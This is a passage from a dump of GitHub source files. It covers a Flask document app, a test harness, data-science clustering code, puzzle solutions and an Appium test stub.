{md}')\n \n # print cue table:\n if len(cues) > 0:\n print()\n print(f'{\"cue\":4} {\"position\":10} {\"length\":8} {\"label\":10} {\"note\":10} {\"text\":10}')\n for c in cues:\n print(f'{c[\"id\"]:4} {c[\"pos\"]:10} {c.get(\"length\", 0):8} {c.get(\"label\", \"\"):10} {c.get(\"note\", \"\"):10} {c.get(\"text\", \"\"):10}')\n\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv)\n","repo_name":"bendalab/audioio","sub_path":"audioio/wavemetadata.py","file_name":"wavemetadata.py","file_ext":"py","file_size_in_byte":13422,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"31392377586","text":"class Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n v, t, mx, idx = [0 for i in range(26)], 0, 0, 0\n for c in tasks:\n idx=ord(c)-ord('A')\n v[idx]+=1\n mx=max(mx,v[idx])\n for i in range(26):\n if mx==v[i]:\n t+=1\n return max(t+(mx-1)*(n+1),len(tasks))","repo_name":"jitaeyun/algorithm","sub_path":"leetcode/Python/task-scheduler.py","file_name":"task-scheduler.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24976391245","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importing Libraries\nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\n\n# In[3]:\n\n\n# Loading dataset and Renaming the columns based on their features.\ncolumns = ['class','alcohol', 'malic_acid', 'ash', 'alcalinity_of_ash', 'magnesium',\n 'total_phenols', 'flavanoids', 'nonflavanoid_phenols',\n 'proanthocyanins', 'color_intensity', 'hue',\n 'dilution_of_wines', 'proline']\n\ndf = pd.read_csv('wine.csv', names=columns, header=0)\ndf.head()\n\n\n# In[4]:\n\n\n# EDA & Data Preprocessing\ndf.info()\n\n\n# In[5]:\n\n\n# Checking for null values\ndf.isna().sum()\n\n\n# In[6]:\n\n\n# Checking predefined no.of cluster\ndf['class'].nunique()\n\n\n# In[7]:\n\n\n#Plot for class\ndf[\"class\"].value_counts().plot.bar(color='Red')\nplt.xlabel(\"Class\")\nplt.legend()\n\n\n# In[8]:\n\n\n# Using the standard scaler method to get the values converted into integers.\nX = df.iloc[:, 1:].values\nfrom sklearn.preprocessing import StandardScaler\nX_normal = scale(X)\n\n\n# In[9]:\n\n\nX_normal.shape\n\n\n# In[10]:\n\n\nX_normal\n\n\n# In[14]:\n\n\n#Building PCA\n''' Using Principal Component Analysis or PCA in short to reduce the dimensionality of the data in order to optimize the result \nof the clustering. '''\nprincipalComponents = pca.fit_transform(X_normal)\npca = PCA()\n\n\n# In[15]:\n\n\nprincipalComponents\n\n\n# In[16]:\n\n\n# Creating a dataframe featuring the two Principal components that we acquired through PCA.\nPCA_dataset = pd.DataFrame(data = principalComponents, columns = ['component1', 'component2', 'component3', 'component4', \n 'component5', 'component6','component7', 'component8', 'component9',\n 'component10', 'component11', 'component12', 'component13'] )\nPCA_dataset.head()\n\n\n# In[28]:\n\n\n# The amount of variance that each PCA explains is \nvar = 'pca.explained_variance_ratio_'\nvar\n\n\n# In[ ]:\n\n\n\n\n\n# In[37]:\n\n\n# Cumulative variance\nvar1 = np.cumsum(np.round(var,decimals = 4)*100)\nvar1\n\n\n# In[35]:\n\n\n'pca.components'\n\n\n# In[36]:\n\n\n# Variance plot for PCA components obtained \nplt.plot(var1,color=\"red\")\n\n\n# In[38]:\n\n\nprincipal_component1 = PCA_dataset['component1']\nprincipal_component2 = PCA_dataset['component2']\nprincipal_component3 = PCA_dataset['component3']\n\n\n# In[39]:\n\n\n# Creating dataframe for further clusering algorithms\npca_df = pd.concat([principal_component1, principal_component2, principal_component3], axis = 1)\npca_df.head()\n\n\n# In[40]:\n\n\n# Visualizing the results of the 3D PCA.\nax = plt.figure(figsize=(10,10)).gca(projection='3d')\nplt.title('3D Principal Component Analysis (PCA)')\nax.scatter(\n xs=principal_component1, \n ys=principal_component2, \n zs=principal_component3, \n)\nax.set_xlabel('pca-one')\nax.set_ylabel('pca-two')\nax.set_zlabel('pca-three')\nplt.show()\n\n\n# In[41]:\n\n\n# Normalizing Dataset\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\npca_df_normal = scaler.fit_transform(pca_df)\nprint(pca_df_normal)\n\n\n# In[42]:\n\n\n# Creating clusters\nfrom sklearn.cluster import AgglomerativeClustering\nH_clusters=AgglomerativeClustering(n_clusters=3,affinity='euclidean',linkage='ward')\nH_clusters\n\n\n# In[43]:\n\n\ny=pd.DataFrame(H_clusters.fit_predict(pca_df_normal),columns=['clustersid_H'])\ny['clustersid_H'].value_counts()\n\n\n# In[45]:\n\n\n# Performing K-MEANS Clustering\nfrom sklearn.cluster import KMeans\n\n\n# In[46]:\n\n\nwcss = []\nfor i in range(1, 11):\n kmeans = KMeans(n_clusters=i,random_state=0)\n kmeans.fit(pca_df_normal)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[47]:\n\n\n#Build Cluster algorithm\nKM_clusters = KMeans(3, random_state=42)\nKM_clusters.fit(pca_df_normal)\n\n\n# In[48]:\n\n\ny=pd.DataFrame(KM_clusters.fit_predict(pca_df_normal),columns=['clusterid_Kmeans'])\ny['clusterid_Kmeans'].value_counts()\n\n\n# In[49]:\n\n\n# Preparing Actual Vs. Predicted Clusering Data\nwine_class = df['class']\nwine_class = pd.Series(wine_class)\n\n\n# In[50]:\n\n\nclustersid_HC = H_clusters.labels_\nclustersid_HC = pd.Series(clustersid_HC)\n\n\n# In[51]:\n\n\nclusterid_Kmeans = KM_clusters.labels_\nclusterid_Kmeans = pd.Series(clusterid_Kmeans)\n\n\n# In[52]:\n\n\npred_df = pd.concat([wine_class, clustersid_HC, clusterid_Kmeans],axis = 1)\npred_df\n\n","repo_name":"Ankush23121999/Data-Science-Assignments","sub_path":"PCA .py","file_name":"PCA .py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40624099814","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom bryophyta.auth import login_required\nfrom bryophyta.db import get_db\nfrom bryophyta.logic.document import Document\nfrom bryophyta.logic.dropbox import Dropbox\n\nbp = Blueprint('dropbox', __name__)\n\n\n@bp.route('/')\ndef index():\n db = get_db()\n documents = db.execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n return render_template('dropbox/index.html', documents=documents)\n\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'INSERT INTO document (title, body, author_id)'\n ' VALUES (?, ?, ?)',\n (title, body, g.user['id'])\n )\n db.commit()\n return redirect(url_for('dropbox.index'))\n\n return render_template('dropbox/create.html')\n\ndef get_document(id, check_author=True):\n document = get_db().execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' WHERE d.id = ?',\n (id,)\n ).fetchone()\n\n if document is None:\n abort(404, f\"Document id {id} doesn't exist.\")\n\n if check_author and document['author_id'] != g.user['id']:\n abort(403)\n\n return document\n\n\n@bp.route('/<int:id>/update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n document = get_document(id)\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'UPDATE document SET title = ?, body = ?'\n ' WHERE id = ?',\n (title, body, id)\n )\n db.commit()\n return redirect(url_for('dropbox.index'))\n\n return render_template('dropbox/update.html', document=document)\n\n\n@bp.route('/<int:id>/delete', methods=('POST',))\n@login_required\ndef delete(id):\n get_document(id)\n db = get_db()\n db.execute('DELETE FROM document WHERE id = ?', (id,))\n db.commit()\n return redirect(url_for('dropbox.index'))\n\n\n@bp.route('/calculate', methods=('GET', 'POST'))\n@login_required\ndef calculate():\n if request.method == 'POST':\n return redirect(url_for('dropbox.index'))\n\n db = get_db()\n documents = db.execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n\n docs = [Document(d['id'], d['title'], d['body']) for d in documents]\n dropbox = Dropbox(docs)\n dropbox.calculate()\n documents = dropbox.documents\n matches = dropbox.list_matches()\n\n return render_template('dropbox/report.html', documents=documents, matches=matches)\n","repo_name":"risperss/bryophyta","sub_path":"bryophyta/dropbox.py","file_name":"dropbox.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18409434042","text":"from confapp import conf\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlAutoComplete\nfrom pyforms_web.widgets.django import ModelAdminWidget\n\nfrom research.models import Publication\n\nfrom people.models import Person, Group\n\nfrom .publication_form import PublicationFormWidget\n\n\nclass PublicationsListWidget(ModelAdminWidget):\n \"\"\"\n \"\"\"\n UID = 'publications'\n TITLE = 'Publications'\n\n MODEL = Publication\n\n ###########################################################################\n # ORQUESTRA CONFIGURATION\n\n LAYOUT_POSITION = conf.ORQUESTRA_HOME_FULL\n ORQUESTRA_MENU = 'left'\n ORQUESTRA_MENU_ORDER = 20\n ORQUESTRA_MENU_ICON = 'newspaper outline yellow'\n # AUTHORIZED_GROUPS = ['superuser']\n ###########################################################################\n\n USE_DETAILS_TO_EDIT = False\n\n LIST_DISPLAY = [\n 'publication_title',\n 'journal',\n 'publication_year',\n 'publication_authors',\n ]\n\n SEARCH_FIELDS = [\n 'publication_title__icontains',\n 'publication_abstract__icontains',\n 'publication_authors__icontains',\n 'authors__full_name__icontains',\n 'publication_doi__icontains'\n ]\n\n LIST_FILTER = [\n 'pubtype',\n 'publication_year',\n 'journal',\n 'publication_keypub',\n ]\n\n EDITFORM_CLASS = PublicationFormWidget\n\n def __init__(self, *args, **kwargs):\n\n self._show_all_filter = ControlCheckBox(\n 'Show only my publications',\n default=True,\n label_visible=True,\n changed_event=self.populate_list\n )\n\n self._researchgroups = ControlAutoComplete(\n 'Groups', \n queryset=Group.objects.all(), \n multiple=True,\n changed_event=self.populate_list\n )\n\n self._people = ControlAutoComplete(\n 'People', \n queryset=Person.objects.all(), \n multiple=True,\n changed_event=self.populate_list\n )\n\n super().__init__(*args, **kwargs)\n\n self._add_btn.label_visible=True\n\n\n\n def get_toolbar_buttons(self, *args, **kwargs):\n add_btn = super().get_toolbar_buttons(*args, **kwargs)\n return (add_btn, '_show_all_filter', '_people','_researchgroups')\n\n def get_queryset(self, request, qs):\n \n if self._show_all_filter.value:\n qs = qs.is_author(user=request.user)\n\n if self._researchgroups.value:\n qs = qs.filter_research_groups(self._researchgroups.value)\n\n if self._people.value:\n qs = qs.filter_people(self._people.value)\n\n return qs\n","repo_name":"research-core/core-research","sub_path":"research/apps/publications/publications.py","file_name":"publications.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71633894664","text":"#node:\n# header\n # - child nodes\n # - metadata\n# 0+ child nodes\n# 1+ metadata\n\nwith open(r'aoc_18_08.txt', 'r') as f:\n raw_input = f.read()\n\n#raw_input = \"2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2\"\ninputs = [int(x) for x in raw_input.strip().split(\" \")]\nmetadata = 0\n\ndef node(inputs, positie):\n global metadata\n this_node = {'amount_of_children': 0, 'amount_of_metadata': 0,\n 'children': [], 'meta-data': [], 'value': 0}\n this_node['amount_of_children'] = inputs[positie]\n positie += 1\n this_node['amount_of_metadata'] = inputs[positie]\n positie += 1\n for nr in range(this_node['amount_of_children']):\n new_position, child = node(inputs, positie)\n positie = new_position\n this_node['children'].append(child)\n for nr in range(this_node['amount_of_metadata']):\n this_node['meta-data'].append(inputs[positie])\n metadata += inputs[positie]\n positie += 1\n if this_node['amount_of_children'] == 0:\n this_node['value'] = sum(this_node['meta-data'])\n else:\n for meta in this_node['meta-data']:\n try:\n this_node['value'] += this_node['children'][meta-1]['value']\n except IndexError:\n continue\n return positie, this_node\n\n# print(node(inputs, 0))\nprint(node(inputs, 0)[1]['value'])\n","repo_name":"Jazende/AdventOfCode","sub_path":"aoc18/aoc_18_08.py","file_name":"aoc_18_08.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2005286891","text":"#Given a list of strings, return all pairs of strings that can make a palindrome. \n\n\ndef pal(lis):\n\n\tpals = []\n\n\t#base case empty\n\n\tif len(lis) <=1:\n\t\treturn 0\n\t\n\n\telse: # real deal\n\t\n\t\tfor i in range(len(lis)):\n\n\t\t\tfor j in range(len(lis)):\n\t\t\t\t\n\t\t\t\t#if (true): \n\n\t\t\t\tif (lis[i] + lis[j] == lis[j] + lis[i]):\n\n\t\t\t\t\tpals.append( lis[i] + lis[j] )\n\n\n\tprint (pals)\n\t\n\n\npal([\"abc\", \"cba\"])\n","repo_name":"NatuMyers/pythonpractice","sub_path":"pal.py","file_name":"pal.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27646980128","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.preprocessing import StandardScaler\n\n# conjunto de dados de cancer de mama\nbreast = load_breast_cancer()\n\n# dataframe para visualizar os dados\nbreast_data = pd.DataFrame(breast.data, columns=breast.feature_names)\nbreast_data.describe().transpose()\n\n# criar grafico com searborn e matplotlib\nplt.figure(figsize=(8, 8))\natrib_medidas = breast_data.columns[1:11]\nm_corr = breast_data[atrib_medidas].corr()\nsns.heatmap(m_corr, cmap='Blues', annot=True, square=True)\n\n# Criar um DataFrame para os rótulos e associá-los com as classes.\n\nlabels = pd.DataFrame(breast.target, columns=['Tipo de cancêr'])\nlabels_class = labels['Tipo de cancêr'].map({0: 'maligno', 1: 'binigno'})\n\n# A seguir, iremos observar a distribuição dos valores de classe no gráfico de barras:\nplt.figure(figsize=(6, 6))\nplt.tick_params(labelbottom=False)\nsns.countplot(data=labels, x='Tipo de cancêr', hue=labels_class, palette=sns.color_palette(\"RdBu\", 2))\n\n# vamos selecionar os últimos 3 atributos do conjunto de dados e plotar os relacionamentos emparelhados do conjunto de dados\n\nbreast_data[\"Tipo de cancêr\"] = labels\natrib_3ultimos = breast_data.columns[27:31]\nplt.figure(figsize=(6, 6))\nsns.pairplot(breast_data[atrib_3ultimos], hue=\"Tipo de cancêr\", palette=\"husl\", markers=['o', 'd'])\n\n# realizar a normalização\n# método de transformação nos dados selecionados (excetoo atributo-alvo):\n\nstdScaler = StandardScaler()\natributos_treinamento = breast_data.columns[0:30]\nbreast_data[atributos_treinamento] = stdScaler.fit_transform(breast_data[atributos_treinamento])\n\n# boas práticas dizem que você deve empregar a validação cruzada com 10 subconjuntos e 10 repetições na avaliação do modelo.\nrkf = RepeatedKFold(n_splits=10, n_repeats=10, random_state=42)\n# Armazena os resultados de todas as iterações\naccuracies = []\nprecisions = []\nrecalls = []\n# verificar e experimentar os algoritmos\n\nfor train_idx, test_idx in rkf.split(breast_data):\n # Divide o conjunto em treinamento/teste\n X_train, X_test = breast_data.iloc[train_idx, :-1], breast_data.iloc[test_idx, :-1]\n y_train, y_test = breast_data.iloc[train_idx, -1], breast_data.iloc[test_idx, -1]\n\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n # prediz os rótulos no conjunto de teste\n y_pred = model.predict(X_test)\n\n # Calcula a acurácia, a precisão e a sensibiidade\n acc = accuracy_score(y_test, y_pred)\n accuracies.append(acc)\n\n prec = precision_score(y_test, y_pred)\n precisions.append(prec)\n\n rec = recall_score(y_test, y_pred)\n recalls.append(rec)\n\nprint(\"Regressão logistica\")\n\nacuracia = \"The acuracia is {:.3f} +- {:.3f} percent.\"\nprint(acuracia.format(np.mean(accuracies), np.std(accuracies)))\n\nprecisao = \"The precision is {:.3f} +- {:.3f} percent.\"\nprint(precisao.format(np.mean(precisions), np.std(precisions)))\n\nsensibilidade = \"The recall is {:.3f} +- {:.3f} percent.\\n\"\nprint(sensibilidade.format(np.mean(recalls), np.std(recalls)))\n\n# Com os hiperparâmetros encontrados e definidos no modelo de Regressão Logística,\n\nmodel = LogisticRegression(C=0.052, penalty='l2', solver='liblinear')\n\nmodel.fit(X_train, y_train)\n# prediz os rótulos no conjunto de teste\ny_pred = model.predict(X_test)\n\n# Calcula a acurácia, a precisão e a sensibiidade\nacc = accuracy_score(y_test, y_pred)\naccuracies.append(acc)\n\nprec = precision_score(y_test, y_pred)\nprecisions.append(prec)\n\nrec = recall_score(y_test, y_pred)\nrecalls.append(rec)\n\nprint(\"Regressão logistica otimizada\")\n\nacuracia = \"The acuracia is {:.3f} +- {:.3f} percent.\"\nprint(acuracia.format(np.mean(accuracies), np.std(accuracies)))\n\nprecisao = \"The precision is {:.3f} +- {:.3f} percent.\"\nprint(precisao.format(np.mean(precisions), np.std(precisions)))\n\nsensibilidade = \"The recall is {:.3f} +- {:.3f} percent.\"\nprint(sensibilidade.format(np.mean(recalls), np.std(recalls)))\n","repo_name":"vitomc22/my-scikit-learn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30007081211","text":"#!/usr/bin/env python3.6\n\"\"\"\n Runs the unit test suite specified by the .tst files.\n\"\"\"\n\nimport sys\nimport os\nimport subprocess\nimport signal\nimport tempfile\nimport re\nimport shutil\nimport io\nimport getopt\nimport json\nfrom collections import namedtuple\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, flush=True, **kwargs)\n\ncolorAvailable = False\ntry:\n from termcolor import colored\n colorAvailable = True\nexcept:\n pass\n\n# status can be \"pass\" \"fail\" \"skip\" or None (for a message)\nTestResult = namedtuple('TestResult', ['status', 'testnum', 'message'])\n\n# get a mapping between signal numbers and names https://stackoverflow.com/a/2549950\nsigDict = dict((k, v) for v, k in reversed(sorted(signal.__dict__.items()))\n if v.startswith('SIG') and not v.startswith('SIG_'))\n\nistty = sys.stderr.isatty()\n\ndef colorize(string, color):\n if istty and colorAvailable:\n return colored(string, color)\n else:\n return string\n\ndef tapParser(stream, outfile):\n numTestsRe = \"^(\\d+)\\.\\.(\\d+)\"\n okRe = \"^ok\\s+(\\d+)?\\s*?(.*)\"\n notOkRe = \"^not ok\\s+(\\d+)?\\s*?(.*)\"\n directiveRe = \"^#\"\n\n numTestsComp = re.compile(numTestsRe)\n okComp = re.compile(okRe)\n notOkComp = re.compile(notOkRe)\n directiveComp = re.compile(directiveRe)\n\n testNum = 0\n numTests = None\n\n for line in stream:\n outfile.write(line)\n\n result = None\n\n # XXX the below pattern runs the regex twice unnecessarily\n if numTestsComp.match(line):\n m = numTestsComp.match(line)\n groups = m.groups()\n numTests = groups[1]\n if okComp.match(line):\n m = okComp.match(line)\n groups = m.groups()\n message = groups[1]\n if \"# skip\" in message.lower():\n result = TestResult(status=\"skip\", message=message, testnum=testNum)\n else:\n result = TestResult(status=\"pass\", message=message, testnum=testNum)\n testNum += 1\n elif notOkComp.match(line):\n m = notOkComp.match(line)\n groups = m.groups()\n result = TestResult(status=\"fail\", message=groups[1], testnum=testNum)\n testNum += 1\n elif directiveComp.match(line):\n m = directiveComp.match(line)\n result = TestResult(status=None, message=line, testnum=None)\n\n if result:\n yield result\n\nclass TestRunner():\n def __init__(self, dryRun=False, group='all'):\n self.topDir = \".\"\n self.dryRun = dryRun\n self.group = group\n self.curDir = os.path.abspath(self.topDir)\n self.tests = []\n self.collectTests(self.curDir)\n return\n\n def runSuite(self):\n eprint(\"TEST_HARNESS_START_PROCESS_TESTS\")\n rtn = self.processTests(self.topDir)\n eprint(\"TEST_HARNESS_END_PROCESS_TESTS\")\n return rtn\n\n def collectTests(self, dirPath):\n \"\"\"Consumes a .tst file and adds all tests discovered\n to self.tests if they match the specified group or the\n group is 'all'\"\"\"\n\n self.curDir = dirPath\n testPath = os.path.join(dirPath, \"sanity.tst\")\n with open(testPath, \"r\") as f:\n try:\n tests, subdirs = self.parseConfig(f)\n if self.group == 'all':\n self.tests += tests\n else:\n self.tests += [t for t in tests if self.group == t['group']]\n except:\n eprint(\"Failed to parse {}\".format(testPath))\n raise\n\n for d in subdirs:\n newDir = os.path.join(dirPath, d)\n if not self.collectTests(newDir):\n return False\n\n return True\n\n def processTests(self, dirPath):\n \"\"\"Executes all enabled tests\n Returns True on success; False on some failure\n \"\"\"\n\n for test in self.tests:\n if test.get(\"enabled\", True):\n if not self.executeTest(test):\n return False\n else:\n self.skipTest(test[\"name\"], \"\", \"Disabled in sanity.tst\")\n\n return True\n\n def _invokeTapTest(self, test):\n \"\"\"Returns True for a passed test\"\"\"\n command = test[\"command\"]\n with tempfile.NamedTemporaryFile('w+t', encoding=\"utf-8\") as errfile, tempfile.NamedTemporaryFile('w+t', buffering=1, encoding=\"utf-8\") as outfile:\n pasteableCommand = '(cd \"{}\" && {})'.format(\n self.curDir,\n \" \".join(command)\n )\n eprint(pasteableCommand)\n eprint(\"stderr -> {}\".format(errfile.name))\n failingResult = None\n pr = subprocess.Popen(command,\n cwd=self.curDir,\n stdout=subprocess.PIPE,\n stderr=errfile,\n bufsize=1,\n encoding=\"utf-8\")\n for testResult in tapParser(pr.stdout, outfile):\n self.printTestResult(test, testResult)\n if testResult.status == \"fail\":\n failingResult = testResult\n\n pr.communicate()\n\n failed = bool(failingResult or pr.returncode != 0)\n if pr.returncode != 0:\n if pr.returncode < 0:\n signalName = sigDict[-pr.returncode]\n message = \"failed with {}\".format(signalName)\n else:\n message = \"returned {}\".format(pr.returncode)\n self.failTest(test[\"name\"], \"\", message)\n\n if failed:\n outfile.seek(0)\n errfile.seek(0)\n\n eprint(\"{} stdout:\".format(test[\"name\"]))\n shutil.copyfileobj(outfile, sys.stderr)\n eprint(\"\\n{}\\n\".format(\"-*\" * 40))\n eprint(\"{} stderr:\".format(test[\"name\"]))\n shutil.copyfileobj(errfile, sys.stderr)\n eprint(\"\\n{}\\n\".format(\"-*\" * 40))\n return False\n return True\n\n def _invokeNonTapTest(self, test):\n res = subprocess.run(test[\"command\"], cwd=self.curDir)\n success = res.returncode == 0\n if not success:\n eprint(\"Test '{}' failed\".format(test[\"name\"]))\n return success\n\n def executeTest(self, test):\n \"\"\"Returns True for a passed test\"\"\"\n\n self.curDir = test[\"path\"]\n if test[\"tap\"]:\n return self._invokeTapTest(test)\n else:\n return self._invokeNonTapTest(test)\n\n def printTestResult(self, test, result):\n if result.status == \"pass\":\n self.passTest(test[\"name\"], result.testnum, result.message)\n elif result.status == \"fail\":\n self.failTest(test[\"name\"], result.testnum, result.message)\n elif result.status == \"skip\":\n self.skipTest(test[\"name\"], result.testnum, result.message)\n elif result.status is None:\n eprint(result.message)\n\n def skipTest(self, testname, testnum, message):\n status = \"SKIP\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"yellow\"),\n testname,\n testnum,\n message))\n\n def passTest(self, testname, testnum, message):\n status = \"PASS\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"green\"),\n testname,\n testnum,\n message))\n\n def failTest(self, testname, testnum, message):\n status = \"FAIL\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"red\"),\n testname,\n testnum,\n message))\n\n def listGroups(self):\n eprint(\"TEST_HARNESS_START_LIST_GROUPS\")\n print(' '.join(set([t['group'] for t in self.tests])))\n eprint(\"TEST_HARNESS_END_LIST_GROUPS\")\n return True\n\n def listTests(self):\n eprint(\"TEST_HARNESS_START_LIST_TESTS\")\n for t in self.tests:\n print(t)\n eprint(\"TEST_HARNESS_END_LIST_TESTS\")\n return True\n\n def getGroupCmd(self, ts):\n \"\"\" Returns group name and command. the group is\n stripped of the leading @\"\"\"\n if ts[0].startswith(\"@\"):\n return (ts[0][1:], ts[1:])\n else:\n return ('default',ts[0:])\n\n def parseConfig(self, cfg):\n tests = []\n subdirs = []\n for line in cfg:\n if not line or line.startswith(\"#\"):\n continue\n tokens = line.split()\n cmd = tokens[0]\n if cmd == \"addtaptest\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd[0])\n test[\"command\"] = testCmd\n test[\"group\"] = group\n test[\"path\"] = self.curDir\n test[\"tap\"] = True\n tests.append(test)\n elif cmd == \"addtest\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd[0])\n test[\"command\"] = testCmd\n test[\"group\"] = group\n test[\"path\"] = self.curDir\n test[\"tap\"] = False\n tests.append(test)\n elif cmd == \"addskip\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd)\n test[\"command\"] = testCmd\n test[\"enabled\"] = False\n test[\"path\"] = self.curDir\n test[\"group\"] = group\n tests.append(test)\n elif cmd == \"subdir\":\n subdir = tokens[1]\n subdirs.append(subdir)\n else:\n raise ValueError(\"test command {} not recognized\".format(cmd))\n\n return tests, subdirs\n\ndef main(argv):\n # fix up any http proxy which may be set up\n # This sometimes intercepts http thrift APIs, returning an error message.\n os.environ[\"http_proxy\"] = \"\"\n os.environ[\"https_proxy\"] = \"\"\n group = os.environ.get('SANITY_GROUP', 'all')\n dryRun = False\n groupNames = False\n ret = 0\n\n try:\n opts, args = getopt.getopt(argv[1:],\"hlng:\")\n except getopt.GetoptError:\n print ('%s -hnj' % argv[0] )\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('test-harness.py' )\n print (' -h help')\n print (' -l list all tests or only those selected by -g')\n print (' -n outputs all group names')\n print (' -g <group> includes only tests labeled @group (note the @)')\n return 0\n elif opt == '-g':\n group = arg\n elif opt == '-l':\n dryRun = True\n elif opt == '-n':\n groupNames = True\n\n runner = TestRunner(group=group)\n\n if dryRun:\n ret = runner.listTests()\n elif groupNames:\n ret = runner.listGroups()\n else:\n ret = runner.runSuite()\n\n if ret:\n return 0\n else:\n return 1\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"varlogtim/xcalar","sub_path":"bin/test-harness.py","file_name":"test-harness.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40076577127","text":"# SPDX-License-Identifier: MIT\nimport abc\nfrom dataclasses import dataclass\nfrom typing import Literal\n\nfrom ..odxtypes import AtomicOdxType, DataType\n\nCompuMethodCategory = Literal[\n \"IDENTICAL\",\n \"LINEAR\",\n \"SCALE-LINEAR\",\n \"TAB-INTP\",\n \"TEXTTABLE\",\n]\n\n\n@dataclass\nclass CompuMethod(abc.ABC):\n internal_type: DataType\n physical_type: DataType\n\n @property\n @abc.abstractmethod\n def category(self) -> CompuMethodCategory:\n pass\n\n def convert_physical_to_internal(self, physical_value: AtomicOdxType) -> AtomicOdxType:\n raise NotImplementedError()\n\n def convert_internal_to_physical(self, internal_value: AtomicOdxType) -> AtomicOdxType:\n raise NotImplementedError()\n\n def is_valid_physical_value(self, physical_value: AtomicOdxType) -> bool:\n raise NotImplementedError()\n\n def is_valid_internal_value(self, internal_value: AtomicOdxType) -> bool:\n raise NotImplementedError()\n","repo_name":"mercedes-benz/odxtools","sub_path":"odxtools/compumethods/compumethod.py","file_name":"compumethod.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"81"} +{"seq_id":"44345674463","text":"import os,sys\nfrom multiprocessing import Process\nfrom .majortomo.broker import Broker\n\ndef start_broker(broker_bind_address):\n\n def start_broker_process(bindpoint):\n broker = Broker(bind=bindpoint)\n broker.run()\n\n pbroker = Process(target=start_broker_process,\n args=(broker_bind_address,))\n pbroker.daemon = True\n pbroker.start()\n\n return pbroker\n","repo_name":"LArbys/ublarcvserver","sub_path":"python/ublarcvserver/start_broker.py","file_name":"start_broker.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"9346692238","text":"#abby\nimport pytest\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\n\n\nclass TestSearch:\n def setup_class(self):\n\n caps={\n \"platformName\": \"Android\",\n \"platformVersion\": \"5.1.1\",\n \"deviceName\": \"Android Emulator\",\n \"appPackage\": \"com.xueqiu.android\",\n \"appActivity\": \".view.WelcomeActivityAlias\",\n \"autoGrantPermissions\": \"true\",\n \"noReset\": \"true\"\n }\n self.driver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',caps)\n 